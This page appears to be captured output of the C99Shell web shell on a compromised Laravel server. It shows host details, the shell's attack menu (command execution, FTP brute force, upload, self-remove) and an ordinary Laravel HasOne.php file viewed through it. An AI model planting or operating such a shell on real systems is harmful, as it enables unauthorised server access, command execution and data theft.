!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Relations/   drwxrwxr-x
Free 13.23 GB of 57.97 GB (22.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HasOne.php (4.04 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Database\Eloquent\Relations;

use 
Illuminate\Contracts\Database\Eloquent\SupportsPartialRelations;
use 
Illuminate\Database\Eloquent\Builder;
use 
Illuminate\Database\Eloquent\Collection;
use 
Illuminate\Database\Eloquent\Model;
use 
Illuminate\Database\Eloquent\Relations\Concerns\CanBeOneOfMany;
use 
Illuminate\Database\Eloquent\Relations\Concerns\ComparesRelatedModels;
use 
Illuminate\Database\Eloquent\Relations\Concerns\SupportsDefaultModels;
use 
Illuminate\Database\Query\JoinClause;

class 
HasOne extends HasOneOrMany implements SupportsPartialRelations
{
    use 
ComparesRelatedModelsCanBeOneOfManySupportsDefaultModels;

    
/**
     * Get the results of the relationship.
     *
     * @return mixed
     */
    
public function getResults()
    {
        if (
is_null($this->getParentKey())) {
            return 
$this->getDefaultFor($this->parent);
        }

        return 
$this->query->first() ?: $this->getDefaultFor($this->parent);
    }

    
/**
     * Initialize the relation on a set of models.
     *
     * @param  array  $models
     * @param  string  $relation
     * @return array
     */
    
public function initRelation(array $models$relation)
    {
        foreach (
$models as $model) {
            
$model->setRelation($relation$this->getDefaultFor($model));
        }

        return 
$models;
    }

    
/**
     * Match the eagerly loaded results to their parents.
     *
     * @param  array  $models
     * @param  \Illuminate\Database\Eloquent\Collection  $results
     * @param  string  $relation
     * @return array
     */
    
public function match(array $modelsCollection $results$relation)
    {
        return 
$this->matchOne($models$results$relation);
    }

    
/**
     * Add the constraints for an internal relationship existence query.
     *
     * Essentially, these queries compare on column names like "whereColumn".
     *
     * @param  \Illuminate\Database\Eloquent\Builder  $query
     * @param  \Illuminate\Database\Eloquent\Builder  $parentQuery
     * @param  array|mixed  $columns
     * @return \Illuminate\Database\Eloquent\Builder
     */
    
public function getRelationExistenceQuery(Builder $queryBuilder $parentQuery$columns = ['*'])
    {
        if (
$this->isOneOfMany()) {
            
$this->mergeOneOfManyJoinsTo($query);
        }

        return 
parent::getRelationExistenceQuery($query$parentQuery$columns);
    }

    
/**
     * Add constraints for inner join subselect for one of many relationships.
     *
     * @param  \Illuminate\Database\Eloquent\Builder  $query
     * @param  string|null  $column
     * @param  string|null  $aggregate
     * @return void
     */
    
public function addOneOfManySubQueryConstraints(Builder $query$column null$aggregate null)
    {
        
$query->addSelect($this->foreignKey);
    }

    
/**
     * Get the columns that should be selected by the one of many subquery.
     *
     * @return array|string
     */
    
public function getOneOfManySubQuerySelectColumns()
    {
        return 
$this->foreignKey;
    }

    
/**
     * Add join query constraints for one of many relationships.
     *
     * @param  \Illuminate\Database\Query\JoinClause  $join
     * @return void
     */
    
public function addOneOfManyJoinSubQueryConstraints(JoinClause $join)
    {
        
$join->on($this->qualifySubSelectColumn($this->foreignKey), '='$this->qualifyRelatedColumn($this->foreignKey));
    }

    
/**
     * Make a new related instance for the given model.
     *
     * @param  \Illuminate\Database\Eloquent\Model  $parent
     * @return \Illuminate\Database\Eloquent\Model
     */
    
public function newRelatedInstanceFor(Model $parent)
    {
        return 
$this->related->newInstance()->setAttribute(
            
$this->getForeignKeyName(), $parent->{$this->localKey}
        );
    }

    
/**
     * Get the value of the model's foreign key.
     *
     * @param  \Illuminate\Database\Eloquent\Model  $model
     * @return mixed
     */
    
protected function getRelatedKeyFrom(Model $model)
    {
        return 
$model->getAttribute($this->getForeignKeyName());
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--